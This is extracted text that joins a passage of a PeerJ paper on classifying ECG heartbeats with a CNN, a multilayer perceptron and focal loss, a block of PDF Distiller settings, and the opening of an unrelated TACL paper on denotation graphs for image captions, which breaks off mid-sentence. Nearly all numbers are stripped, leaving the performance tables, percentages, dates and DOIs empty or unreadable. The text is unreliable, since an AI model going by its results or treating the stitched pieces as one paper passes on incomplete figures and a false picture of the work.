http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an -bit resolution. the first lead is the modified-lead ii (ml ii), and the second lead depends on the record, one of v , v , v or v . the heartbeat of these ecg signals is independently labeled by two or more doctors, and there are about , heartbeats. according to the recommendation of aami, these heartbeats are further divided into five heartbeat classes. table shows the mapping of aami classes and mit-bih arrhythmia heartbeat types. since q is practically non-existent, we ignore it like others (mar et al., ; zhang et al., ). meanwhile, four recordings with paced beats are figure the relationship between the modulating factor γ and the cost of the well-classified examples (lin et al., ). full-size doi: . /peerj-cs. /fig- table mapping of aami classes and mit-bih arrhythmia heartbeat types. aami classes mit-bih types mit-bih annotate normal (n) normal beat (nor) n nodal (junctional) escape beat (ne) j atrial escape beat (ae) e right bundle branch block beat (rbbb) r left bundle branch block beat (lbbb) l supraventricular ectopic beat (sveb) aberrated arial premature beat (aap) a premature or ectopic supraventricular beat (sp) s nodal (junctional) premature beat (np) j atrial premature beat (ap) a ventricular ectopic beat (veb) ventricular escape beat (ve) e premature ventricular contraction (pvc) v fusion beat (f) fusion of ventricular and normal beat (fvn) f unknown beat (q) unclassifiable beat (u) q fusion of paced and normal beat (fpn) f paced beat (p) / wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ removed in consistent with the aami recommended practice, namely , , and . since all records have ml ii ecg signals and they are widely used in wireless body sensor network (wbsn) based ecg applications, this lead ecg signal is used for heartbeat classification in the article. as we mentioned in related works, the article focuses on the heartbeat classification under the inter-patient paradigm. to facilitate comparison with existing works, we follow de chazal, o’dwyer & reilly ( ) to split the dataset into two subsets. each contains regular and complex arrhythmia records and has roughly the same number of heartbeat types. table shows the details of two subsets. the first (ds ) is used for training whereas the second (ds ) is used to test the heartbeat classification performance (de chazal, o’dwyer & reilly, ). no patient appears in both subsets at the same time. model training and performance metrics in the study, the general focal loss (non-α-balanced focal loss) is used as the loss function, and the modulating factor g is set to the default value (g = ). since adam can accelerate the model training, we use it as the optimizer. the batch size of the model is set to and the maximum epoch is . the initial learning rate is . , and reduced by . times every epochs. in addition, in order to avoid overfitting, the l penalty is set to e− based on trial and error. the model is implemented using keras and trained on the nvidia geforce rtx ti graphical processing unit. to evaluate the performance of our proposed method, three widely used metrics are adopted, namely positive predictive value (ppv), sensitivity (se), and accuracy (acc), which are defined as: ppvi ¼ tpi tpi þ fpi sei ¼ tpi tpi þ fni acci ¼ tpi þ tni tpi þ tni þ fpi þ fni where tpi (true positive) refers to the number of the ith class is correctly classified, fpi (false positive) is equal to the number of heartbeats misclassified as the ith class, tni (true negative) is the number of heartbeats that are not in the ith class and not classified into the ith class, and fni (false negative) is equal to the number of heartbeats of the ith class classified as other classes. ppvi indicates the proportion of positive correct table detailed breakdown of the dataset. dataset no. of samples per aami class total n sveb veb f ds , , , ds , , , , total (ds + ds ) , , , , wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ classification, and sei reflects the sensitivity of the classifier in the ith class. acci is the ratio of all correct classifications. since the heartbeat classes are imbalanced, f -score (f ) is also selected as the performance measure, defined as: f i ¼ � ppvi � sei ppvi þ sei f -score takes both the positive predictive value ppvi and sensitivity sei into account, and is generally useful than acci in the imbalance class distribution (chen, ). comparison with existing works based on de chazal, o’dwyer & reilly ( ), the dataset is divided into ds and ds datasets. ds is used for training and ds is used to test our proposed method. for fair evaluation, we compare works (chen et al., ; de chazal, o’dwyer & reilly, ; garcia et al., ; liu et al., ; mar et al., ; zhang et al., ) that adopt the same strategy. as sveb and veb are more important than other classes, we list the detailed information of these two classes in table . the experimental results show that the proposed method has better recognition in the inter-patient paradigm, with f s of sveb and veb of . % and . %, respectively. in particular, the ppv of sveb is . %, indicating that the proposed method has better sveb recognition ability. the . % se of veb is superior to most reported works. the evaluation results of all four-classes are listed in table . the results related to ppv and se are close to or surpass those obtained with existing works except for f. for category f, it is mainly composed of the fusion of ventricular beat and normal beat, which is very close to the normal heartbeat. meanwhile, compared with other categories, f has the least number and the most serious imbalance. as a result, the performance of existing works is unstable in this category, usually a large number of n is predicted as f or f is predicted as n. in the article, although the focus loss is introduced, due to the high imbalance of f, the proposed method cannot extract the discriminate features. mar et al. ( ) although, obtains the best ppv in f, a large number of n is incorrectly classified as f. we suggest that category f can be included in other categories in future research. table performance comparison of our proposed method with existing works in sveb and veb classes. methods sveb veb ppv (%) se (%) f (%) accuracy (%) ppv (%) se (%) f (%) accuracy (%) de chazal, o’dwyer & reilly ( ) . . . . . . . . chen et al. ( ) . . . . . . . . zhang et al. ( ) . . . . . . . . mar et al. ( ) . . . . . . . . liu et al. ( ) . . . . . . . . garcia et al. ( ) . . . – . . . – our proposed method . . . . . . . . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ discussion focal loss vs. cross-entropy loss since the heartbeat has an imbalanced class distribution, the cross-entropy loss is replaced by the focal loss as the loss function of the model in the article. the performance comparison of the two losses is listed in table . both losses have similar overall accuracy, but compared to cross-entropy loss, the overall ppv, se and f of the focal loss are significantly improved. an overall ppv of . %, se of . %, and f of . % are achieved by the focal loss, while the cross-entropy loss obtains an overall ppv of . %, se of . %, and f of . %. the corresponding metrics increased by . %, . %, and . %, respectively. in addition, for each specific class, the ppv, se, and f of the focal loss also have achieved comparable or better performance than the cross-entropy loss, especially in the f . the confusion matrix of the two losses is listed in table . the focal loss achieves a total of , correct predictions, while the cross-entropy obtains , correct table performance comparison of our proposed method with existing works in all four classes. methods accuracya macro-f b n sveb veb f ppv (%) se (%) ppv (%) se (%) ppv (%) se (%) ppv (%) se (%) de chazal, o’dwyer & reilly ( ) . . . . . . . . . . chen et al. ( ) . . . . . . . . . . zhang et al. ( ) . . . . . . . . . . mar et al. ( ) . . . . . . . . . . liu et al. ( ) – . . . . . . . . . garcia et al. ( ) . . . . . . . . – – our proposed method . . . . . . . . . . notes: a accuracy = (tpn + tpsveb + tpveb + tpf)/number of testing heartbeats. b average f -score of four aami classes. table performance comparison of focal loss and cross-entropy loss. methods aami class performance metrics ppv (%) se (%) f (%) accuracy (%) focal loss n . . . . sveb . . . . veb . . . . f . . . . averagea . . . . cross-entropy loss n . . . . sveb . . . . veb . . . . f . . . . averagea . . . . note: a refers to the average value of the corresponding metrics of four aami classes. wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ predictions. with the focal loss, the total correct prediction has slightly increased, perhaps due to the suppression of easy-to-classify samples by focal loss. conclusions a hybrid method for heartbeat classification via cnn, mlp and focal loss is developed in the article. among them, cnn is used to extract the morphological features of the heartbeat. then the morphological features are combined with the rr intervals features and input into the mlp to perform heartbeat classification. furthermore, in order to avoid the impact of heartbeat imbalance, a focal loss function is introduced. tested by using the mit-bih arrhythmia database, the experimental results confirm that the method has good overall performance, with f of . % and accuracy of . %. the superiority of the proposed method is due to multifactorial: (i) compared with traditional hand-craft features, cnn as an automatic extraction method can adapt to small mutations in ecg signals to obtain powerful features; (ii) besides the cnn-based morphological features, the pre-extracted rr interval features are also combined to build the model, avoiding the loss of dynamic information due to heartbeat segmentation; (iii) a focal loss function is introduced to solve the class imbalance, preventing the model from biasing towards the majority class; (iv) one-step training can improve the model to obtain better feature abstraction capabilities. due to the simple yet effective of the proposed inter-patient method, it has the potential to be used for personal automatic heartbeat classification for surveillance in telemedicine. the encouraging results have inspired continuous exploration. the future work will include (i) testing the performance of the developed model with more ecg signals; (ii) designing or modifying cnn architecture to further improve the performance of our method; (iii) trying to use additional techniques such as wavelet transform to convert time-domain information to frequency-domain information to reduce the difficulty of cnn feature extraction. additional information and declarations funding the work is supported by the science and technology service network initiative of the chinese academy of sciences (grant no. kfj-sts-zdtp- ). the funders had no role in table confusion matrix of focal loss and cross-entropy loss. focal loss predicted class total cross-entropy loss predicted class total n sveb veb f n sveb veb f ground truth n , , , n , , , , sveb , , sveb , , veb , , veb , , f f total , , , , , total , , , , wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: science and technology service network initiative of the chinese academy of sciences: kfj-sts-zdtp- . competing interests mei yang is employed by beijing huaru technology co., ltd. author contributions � tao wang conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � changhua lu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � mei yang conceived and designed the experiments, performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � feng hong conceived and designed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � chun liu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: this work uses a public dataset from: goldberger, a., amaral, l., glass, l., hausdorff, j., ivanov, p.c., mark, r., mietus, j.e., moody, g.b., peng, c.k. and stanley, h.e., . physiobank, physiotoolkit, and physionet: components of a new research resource for complex physiologic signals. circulation [online]. ( ), pp. e –e . https://www.physionet.org/content/mitdb/ . . /. code is available at github: https://github.com/jackandcole/deep-neural-network- for-heartbeat-classification. references chen s, hua w, li z, li j, gao x. . heartbeat classification using projected and dynamic features of ecg signal. biomedical signal processing and control : – . chen y. . learning classifiers from imbalanced, only positive and unlabeled data sets. department of computer science, iowa state university. available at http://web.cs.iastate.edu/ ~yetianc/cs /files/cs _projectreport_yetianchen.pdf (accessed january ). wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.physionet.org/content/mitdb/ . . / https://www.physionet.org/content/mitdb/ . . / https://github.com/jackandcole/deep-neural-network-for-heartbeat-classification https://github.com/jackandcole/deep-neural-network-for-heartbeat-classification http://web.cs.iastate.edu/~yetianc/cs /files/cs _projectreport_yetianchen.pdf http://web.cs.iastate.edu/~yetianc/cs /files/cs _projectreport_yetianchen.pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chu j, wang h, lu w. a. a novel two-lead arrhythmia classification system based on cnn and lstm. journal of mechanics in medicine and biology ( ): doi . /s . chu y, shen h, huang k. b. ecg authentication method based on parallel multi-scale one- dimensional residual network with center and margin loss. ieee access : – doi . /access. . . de albuquerque vhc, nunes tm, pereira dr, luz ejds, menotti d, papa jp, tavares jmrs. . robust automated cardiac arrhythmia detection in ecg beat signals. neural computing and applications : – . de chazal p, o’dwyer m, reilly rb. . automatic classification of heartbeats using ecg morphology and heartbeat interval features. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . gacek a, pedrycz w. . ecg signal processing, classification and interpretation. london: springer, . garcia g, moreira g, menotti d, luz e. . inter-patient ecg heartbeat classification with temporal vcg optimized by pso. scientific reports ( ): doi . /s - - - . hannun ay, rajpurkar p, haghpanahi m, tison gh, bourn c, turakhia mp, ng ay. . cardiologist-level arrhythmia detection and classification in ambulatory electrocardiograms using a deep neural network. nature medicine ( ): – doi . /s - - - . howland ds, liu j, she y, goad b, maragakis nj, kim b, erickson j, kulik j, devito l, psaltis g, degennaro lj, cleveland dw, rothstein jd. . focal loss of the glutamate transporter eaat in a transgenic rat model of sod mutant-mediated amyotrophic lateral sclerosis (als). proceedings of the national academy of sciences : – doi . /pnas. . huang j, liu h, dai j, cai w. . reconstruction for limited-data nonlinear tomographic absorption spectroscopy via deep learning. journal of quantitative spectroscopy and radiative transfer : – doi . /j.jqsrt. . . . lin t-y, goyal p, girshick r, he k, dollár p. . focal loss for dense object detection. in: proceedings of the ieee international conference on computer vision. – . liu j, song s, sun g, fu y. . classification of ecg arrhythmia using cnn, svm and lda. cham: springer international publishing, – . liu y, chen y. . recognition of facial expression based on cnn-cbp features. in: th chinese control and decision conference (ccdc). piscataway: ieee, – . mar t, zaunseder s, martínez jp, llamedo m, poll r. . optimization of ecg classification by means of feature selection. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . mondéjar-guerra v, novo j, rouco j, penedo mg, ortega m. . heartbeat classification fusing temporal and morphological information of ecgs via ensemble of classifiers. biomedical signal processing and control : – doi . /j.bspc. . . . moody gb, mark rg. . the impact of the mit-bih arrhythmia database. ieee engineering in medicine and biology magazine : – doi . / . . palaz d, magimai-doss m, collobert r. . analysis of cnn-based speech recognition system using raw speech as input. in: interspeech. available at http://publications.idiap.ch/index.php/ publications/show/ . pan j, tompkins wj. . a real-time qrs detection algorithm. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s http://dx.doi.org/ . /access. . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /j.jqsrt. . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . / . http://publications.idiap.ch/index.php/publications/show/ http://publications.idiap.ch/index.php/publications/show/ http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pourbabaee b, roshtkhari mj, khorasani k. . deep convolutional neural networks and learning ecg features for screening paroxysmal atrial fibrillation patients. ieee transactions on systems, man, and cybernetics: systems ( ): – doi . /tsmc. . . robinson s, cattaneo a, el-said m. . updating and estimating a social accounting matrix using cross entropy methods. economic systems research : – doi . / . romdhane tf, alhichri h, ouni r, atri m. . electrocardiogram heartbeat classification based on a deep convolutional neural network and focal loss. computers in biology and medicine : doi . /j.compbiomed. . . ruangsuwana r, velikic g, bocko m. . methods to extract respiration information from ecg signals. in: ieee international conference on acoustics, speech and signal processing. piscataway: ieee, – . sannino g, de pietro g. . a deep learning approach for ecg-based heartbeat classification for arrhythmia detection. future generation computer systems : – doi . /j.future. . . . sellami a, hwang h. . a robust deep convolutional neural network with batch-weighted loss for heartbeat classification. expert systems with applications : – doi . /j.eswa. . . . shen r, yu y, lan r, yu r, yuan z, xia z. . the cardiovascular toxicity induced by high doses of gatifloxacin and ciprofloxacin in zebrafish. environmental pollution : doi . /j.envpol. . . . vulaj z, draganić a, brajović m, orović i. . a tool for ecg signal analysis using standard and optimized hermite transform. in: th mediterranean conference on embedded computing (meco). piscataway: ieee, – . ye c, kumar bv, coimbra mt. . heartbeat classification using morphological and dynamic features of ecg signals. ieee transactions on biomedical engineering : – doi . /tbme. . . yıldırım Ö., pławiak p, tan r-s, acharya ur. . arrhythmia detection using deep convolutional neural network with long duration ecg signals. computers in biology and medicine : – doi . /j.compbiomed. . . . yin w, kann k, yu m, schütze h. . comparative study of cnn and rnn for natural language processing. available at https://arxiv.org/abs/ . . zhang q, zhou d, zeng x. . heartid: a multiresolution convolutional neural network for ecg-based biometric human identification in smart health applications. ieee access : – . zhang z, dong j, luo x, choi k-s, wu x. . heartbeat classification using disease-specific feature selection. computers in biology and medicine : – doi . /j.compbiomed. . . . zhou f-q, waterman-storer cm, cohan cs. . focal loss of actin bundles causes microtubule redistribution and growth cone turning. journal of cell biology ( ): – doi . /jcb. . wang et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.envpol. . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /j.compbiomed. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.compbiomed. . . http://dx.doi.org/ . /jcb. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a hybrid method for heartbeat classification via convolutional neural networks, multilayer perceptrons and focal loss introduction related works methods results discussion conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice from image descriptions to visual denotations: new similarity metrics for semantic inference over event descriptions from image descriptions to visual denotations: new similarity metrics for semantic inference over event descriptions peter young alice lai micah hodosh julia hockenmaier department of computer science university of illinois at urbana-champaign {pyoung , aylai , mhodosh , juliahmr}@illinois.edu abstract we propose to use the visual denotations of linguistic expressions (i.e. the set of images they describe) to define novel denotational similarity metrics, which we show to be at least as beneficial as distributional similarities for two tasks that require semantic inference. to compute these denotational similarities, we construct a denotation graph, i.e. a subsump- tion hierarchy over constituents and their de- notations, based on a large corpus of k im- ages and k descriptive captions. introduction the ability to draw inferences from text is a prereq- uisite for language understanding. these inferences are what makes it possible for even brief descrip- tions of everyday scenes to evoke rich mental im- ages. for example, we would expect an image of people shopping in a supermarket to depict aisles of produce or other goods, and we would expect most of these people to be customers who are either standing or walking around. but such inferences require a great deal of commonsense world knowl- edge. standard distributional approaches to lexical similarity (section . ) are very effective at iden- tifying which words are related to the same topic, and can provide useful features for systems that per- form semantic inferences (mirkin et al., ), but are not suited to capture precise entailments between complex expressions. in this paper, we propose a novel approach for the automatic acquisition of de- notational similarities between descriptions of ev- eryday situations (section ). we define the (visual) denotation of a linguistic expression as the set of im- ages it describes. we create a corpus of images of everyday activities (each paired with multiple cap- tions; section ) to construct a large scale visual de- notation graph which associates image descriptions with their denotations (section ). the algorithm that constructs the denotation graph uses purely syn- tactic and lexical rules to produce simpler captions (which have a larger denotation). but since each image is originally associated with several captions, the graph can also capture similarities between syn- tactically and lexically unrelated descriptions. we apply these similarities to two different tasks (sec- tions and ): an approximate entailment recogni- tion task for our domain, where the goal is to decide whether the hypothesis (a brief image caption) refers to the same image as the premises (four longer cap- tions), and the recently introduced semantic textual similarity task (agirre et al., ), which can be viewed as a graded (rather than binary) version of paraphrase detection. both tasks require semantic inference, and our results indicate that denotational similarities are at least as effective as standard ap- proaches to similarity. our code and data set, as well as the denotation graph itself and the lexical similarities we define over it are available for re- search purposes at http://nlp.cs.illinois.edu/ denotation.html. towards denotational similarities . distributional similarities the distributional hypothesis posits that linguistic expressions that appear in similar contexts have a transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. gray haired man in black suit and yellow tie working in a financial environment. a graying man in a suit is perplexed at a business meeting. a businessman in a yellow tie gives a frustrated look. a man in a yellow tie is rubbing the back of his neck. a man with a yellow tie looks concerned. a butcher cutting an animal to sell. a green-shirted man with a butcher’s apron uses a knife to carve out the hanging carcass of a cow. a man at work, butchering a cow. a man in a green t-shirt and long tan apron hacks apart the carcass of a cow while another man hoses away the blood. two men work in a butcher shop; one cuts the meat from a butchered cow, while the other hoses the floor. figure : two images from our data set and their five captions similar meaning (harris, ). this has led to the definition of vector-based distributional similarities, which represent each word w as a vector w derived from counts of w’s co-occurrence with other words. these vectors can be used directly to compute the lexical similarities of words, either via the cosine of the angle between them, or via other, more com- plex metrics (lin, ). more recently, asymmetric similarities have been proposed as more suitable for semantic inference tasks such as entailment (weeds and weir, ; szpektor and dagan, ; clarke, ; kotlerman et al., ). distributional word vectors can also be used to define the compositional similarity of longer strings (mitchell and lapata, ). to compute the similarity of two strings, the lexical vectors of the words in each string are first combined into a single vector (e.g. by element-wise addition or multiplication), and then an appropriate vector similarity (e.g. cosine) is applied to the re- sulting pair of vectors. . visual denotations our approach is inspired by truth-conditional se- mantic theories in which the denotation of a declar- ative sentence is assumed to be the set of all situa- tions or possible worlds in which the sentence is true (montague, ; dowty et al., ; barwise and perry, ). restricting our attention to visually descriptive sentences, i.e. non-negative, episodic (carlson, ) sentences that can be used to de- scribe an image (figure ), we propose to instantiate the abstract notions of possible worlds or situations with concrete sets of images. the interpretation function j·k maps sentences to their visual denota- tions jsk, which is the set of images i ∈ us ⊆ u in a ‘universe’ of images u that s describes: jsk = {i ∈ u | s is a truthful description of i} ( ) similarly, we map nouns and noun phrases to the set of images that depict the objects they describe, and verbs and verb phrases to the set of images that depict the events they describe. . denotation graphs denotations induce a partial ordering over descrip- tions: if s (e.g. “a poodle runs on the beach”) en- tails a description s′ (e.g. “a dog runs”), its denota- tion is a subset of the denotation of s′ (jsk ⊆ js′k), and we say that s′ subsumes the more specific s (s′ v s). in our domain of descriptive sentences, we can obtain more generic descriptions by simple syntactic and lexical operations ω ∈ o ⊂ s × s that preserve upward entailment, so that if ω(s) = s′, jsk ⊆ js′k. we consider three types of oper- ations: the removal of optional material (e.g pps like on the beach), the extraction of simpler con- stituents (nps, vps, or simple ss), and lexical sub- stitutions of nouns by their hypernyms (poodle → dog). these operations are akin to the atomic ed- its of maccartney and manning ( )’s natlog system, and allow us to construct large subsump- tion hierarchies over image descriptions, which we call denotation graphs. given a set of (upward entailment-preserving) operations o ⊂ s × s, the denotation graph dg = 〈e,v 〉 of a set of images i and a set of strings s represents a subsumption hier- archy in which each node v = 〈s, jsk〉 corresponds to a string s ∈ s and its denotation jsk ⊆ i. di- rected edges e = (s,s′) ∈ e ⊆ v × v indicate a subsumption relation s v s′ between a more generic expression s and its child s′. an edge from s to s′ exists if there is an operation ω ∈ o that reduces the string s′ to s (i.e. ω(s′) = s) and its inverse ω− expands the string s to s′ (i.e. ω− (s) = s′). . denotational similarities given a denotation graph over n images, we esti- mate the denotational probability of an expression s with a denotation of size |jsk| as pjk(s) = |jsk|/n, and the joint probability of two expressions analo- gously as pjk(s,s ′) = |jsk ∩ js′k|/n. the condi- tional probability pjk(s | s′) indicates how likely s is to be true when s′ holds, and yields a simple directed denotational similarity. the (normalized) pointwise mutual information (pmi) (church and hanks, ) defines a symmetric similarity: npmi jk(s,s ′) = log ( pjk(s,s′) pjk(s)pjk(s′) ) − log(pjk(s,s′)) we set pjk(s|s) = npmi jk(s,s) = , and, if s or s′ are not in the denotation graph, npmi jk(s,s′) = pjk(s,s ′) = . our data set our data set (figure ) consists of , pho- tographs of everyday activities, events and scenes (all harvested from flickr) and , captions (obtained via crowdsourcing). it contains and ex- tends hodosh et al. ( )’s corpus of , im- ages. we followed hodosh et al. ( )’s approach to collect images. we also use their annotation guidelines, and use similar quality controls to cor- rect spelling mistakes, eliminate ungrammatical or non-descriptive sentences. almost all of the im- ages that we add to those collected by hodosh et al. ( ) have been made available under a cre- ative commons license. each image is described in- dependently by five annotators who are not familiar with the specific entities and circumstances depicted in them, resulting in captions such as “three people setting up a tent”, rather than the kind of captions people provide for their own images (“our trip to the olympic peninsula”). moreover, different an- notators use different levels of specificity, from de- scribing the overall situation (performing a musical piece) to specific actions (bowing on a violin). this variety of descriptions associated with the same im- age is what allows us to induce denotational similari- ties between expressions that are not trivially related by syntactic rewrite rules. constructing the denotation graph the construction of the denotation graph consists of the following steps: preprocessing and linguistic analysis of the captions, identification of applicable transformations, and generation of the graph itself. preprocessing and linguistic analysis we use the linux spell checker, the opennlp tok- enizer, pos tagger and chunker (http://opennlp. apache.org), and the malt parser (nivre et al., ) to analyze the captions. since the vocabulary of our corpus differs significantly from the data these tools are trained on, we resort to a number of heuris- tics to improve the analyses they provide. since some heuristics require us to identify different entity types, we developed a lexicon of the most common entity types in our domain (people, clothing, bodily appearance (e.g. hair or body parts), containers of liquids, food items and vehicles). after spell-checking, we normalize certain words and compounds with several spelling variations, e.g. barbecue (barbeque, bbq), gray (grey), waterski (water ski), brown-haired (brown haired), and to- kenize the captions using the opennlp tokenizer. the opennlp pos tagger makes a number of sys- tematic errors on our corpus (e.g. mistagging main verbs as nouns). since these errors are highly sys- tematic, we are able to correct them automatically by applying deterministic rules (e.g. climbs is never a noun in our corpus, stand is a noun if it is pre- ceded by vegetable but a verb when preceded by a noun that refers to people). these fixes apply to , ( % of the , image captions). next, we use the opennlp chunker to create a shallow parse. fixing its (systematic) errors affects , captions. we then analyze the structure of each np chunk to identify heads, determiners and pre- nominal modifiers. the head may include more than a single token if wordnet (or our hypernym lexi- con, described below) contains a corresponding en- try (e.g. little girl). determiners include phrases such as a couple or a few. although we use the malt parser (nivre et al., ) to identify subject- verb-object dependencies, we have found it more ac- curate to develop deterministic heuristics and lexi- cal rules to identify the boundaries of complex (e.g. conjoined) nps, allowing us to treat “a man with red shoes and a white hat” as an np followed by a sin- gle 